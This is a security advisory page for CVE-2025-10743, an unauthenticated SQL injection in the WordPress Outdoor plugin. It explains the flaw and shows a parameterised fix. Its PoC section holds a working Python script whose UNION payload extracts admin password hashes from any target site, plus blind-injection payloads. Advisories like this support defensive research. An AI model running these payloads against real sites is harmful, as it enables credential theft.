Security Vulnerability Report
CVE-2025-10743 CVSS 7.5 HIGH

CVE-2025-10743

Published: 2025-10-15 09:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Outdoor plugin for WordPress is vulnerable to SQL Injection via the 'edit' action in all versions up to, and including, 1.3.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
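To make the CWE-89 pattern in the description concrete, the following is an added example and not the Outdoor plugin's code (this page does not include the plugin source, only a link to actions.php). It places a string-concatenated lookup of the kind the advisory describes next to a parameterised one and runs both against a constructed in-memory SQLite database. The outdoor_items table, the wp_users-shaped table and its sample row are assumptions for illustration; the UNION payload is the one used by the PoC on this page. In WordPress the hardened form corresponds to $wpdb->prepare() with a %d placeholder.

```python
import sqlite3

# Constructed sample schema (assumption, not the plugin's real tables): a
# content table the 'edit' style query is meant to read, and a wp_users-shaped
# table holding the data an attacker would pull across with UNION.
SAMPLE_SCHEMA = """
CREATE TABLE outdoor_items (id INTEGER, title TEXT, body TEXT);
INSERT INTO outdoor_items VALUES (1, 'Trail map', 'public content');
INSERT INTO outdoor_items VALUES (2, 'Campsite', 'public content');
CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT, user_email TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '$P$placeholder-not-a-real-hash', 'admin@example.test');
"""

# The UNION payload quoted in the PoC on this page. It supplies three columns
# because the query it is appended to selects three.
UNION_PAYLOAD = "1 UNION SELECT user_login,user_pass,user_email FROM wp_users WHERE ID=1-- -"


def build_db():
    """Create the constructed sample database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def edit_item_vulnerable(conn, item_id):
    """CWE-89 pattern from the advisory: the request parameter is spliced into
    the SQL text with no escaping or preparation, so it can change the
    structure of the query (here: append a UNION against another table)."""
    sql = "SELECT id, title, body FROM outdoor_items WHERE id = " + item_id
    return conn.execute(sql).fetchall()


def edit_item_fixed(conn, item_id):
    """Hardened form: the value is bound as a parameter. The database only ever
    compares it against id; the SQL structure is fixed before the value is
    seen, so the same payload matches no row instead of leaking one."""
    sql = "SELECT id, title, body FROM outdoor_items WHERE id = ?"
    return conn.execute(sql, (item_id,)).fetchall()


def leaked_rows(rows):
    """Rows whose first column is not an integer cannot have come from
    outdoor_items.id; they were unioned in from another table."""
    return [r for r in rows if not isinstance(r[0], int)]


if __name__ == "__main__":
    db = build_db()
    vuln = edit_item_vulnerable(db, UNION_PAYLOAD)
    print("vulnerable query returned:", vuln)
    print("rows leaked from other tables:", leaked_rows(vuln))
    print("fixed query with same payload:", edit_item_fixed(db, UNION_PAYLOAD))
    print("fixed query with id=1:", edit_item_fixed(db, "1"))
```

The vulnerable function returns the legitimate row plus the wp_users row; the parameterised one returns nothing for the payload and the expected row for a plain id. This is why the CVSS vector carries C:H with I:N/A:N: a UNION read pulls data out but does not modify it.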

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Decoded: Attack Vector Network, Attack Complexity Low, Privileges Required None, User Interaction None, Scope Unchanged; Confidentiality High, Integrity None, Availability None (exploitability subscore 3.9, impact subscore 3.6)
Weakness: CWE-89 (SQL Injection)

Configurations (Affected Products)

No CPE configuration data is available from NVD for this record (vulnStatus: Deferred). Affected product as stated in the advisory:

WordPress Outdoor Plugin <= 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10743 - Outdoor Plugin SQL Injection PoC
# Vulnerability: Unauthenticated SQL Injection via 'edit' action
# Affected: WordPress Outdoor Plugin <= 1.3.2
#
# Assumptions baked into this PoC (not confirmed by the advisory text):
#   - the vulnerable value is reached as ?action=edit&id=<value> on the site root
#   - the existing query selects three columns, so the UNION must supply three
#   - the table prefix is the WordPress default wp_
import re
import sys

import requests

if len(sys.argv) < 2:
    sys.exit(f"usage: {sys.argv[0]} http://target.example")
target_url = sys.argv[1].rstrip("/")

# Step 1: UNION-based probe against the 'edit' action.
# Based on the vulnerable code in actions.php line ~73 (see References).
payload = "1 UNION SELECT user_login,user_pass,user_email FROM wp_users WHERE ID=1-- -"

# Pass the payload as a query parameter so requests URL-encodes it,
# rather than splicing it raw into the URL string.
params = {"action": "edit", "id": payload}

# WordPress password hash prefixes: phpass ($P$), bcrypt ($2y$), WP 6.8+ ($wp$).
# A match on one of these is a far stronger signal than the word "admin",
# which appears on almost every WordPress page (wp-admin links and similar).
HASH_RE = re.compile(r"\$(?:P|2y|wp)\$[A-Za-z0-9./$]{8,}")

print(f"[*] Target: {target_url}")
print("[*] Testing SQL injection via 'edit' action...")
try:
    response = requests.get(f"{target_url}/", params=params, timeout=10)
    if response.status_code == 200:
        print(f"[+] Request successful (Status: {response.status_code})")
        # Check whether the response carries data that could only come from wp_users
        if HASH_RE.search(response.text):
            print("[+] SQL Injection confirmed! Password hash material found in response.")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print("[-] No obvious data leakage detected; check the column count and "
                  "table prefix, or try blind injection techniques")
    else:
        print(f"[-] Unexpected status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative: Time-based blind SQL injection
# payload = "1 AND SLEEP(5)-- -"
# Use this if UNION-based injection is filtered; compare the response time
# against a baseline request to the same endpoint.
# Alternative: Boolean-based blind injection
# payload = "1 AND 1=1-- -"  # True condition
# payload = "1 AND 1=2-- -"  # False condition
# Compare the two responses to extract data character by character

References

https://plugins.trac.wordpress.org/browser/outdoor/trunk/actions.php#L73
https://wordpress.org/plugins/outdoor/
https://www.wordfence.com/threat-intel/vulnerabilities/id/6038accc-98ac-496c-9c53-ec06b2045324?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10743",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-15T09:15:41.717",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Outdoor plugin for WordPress is vulnerable to SQL Injection via the 'edit' action in all versions up to, and including, 1.3.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/outdoor/trunk/actions.php#L73",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/outdoor/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6038accc-98ac-496c-9c53-ec06b2045324?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}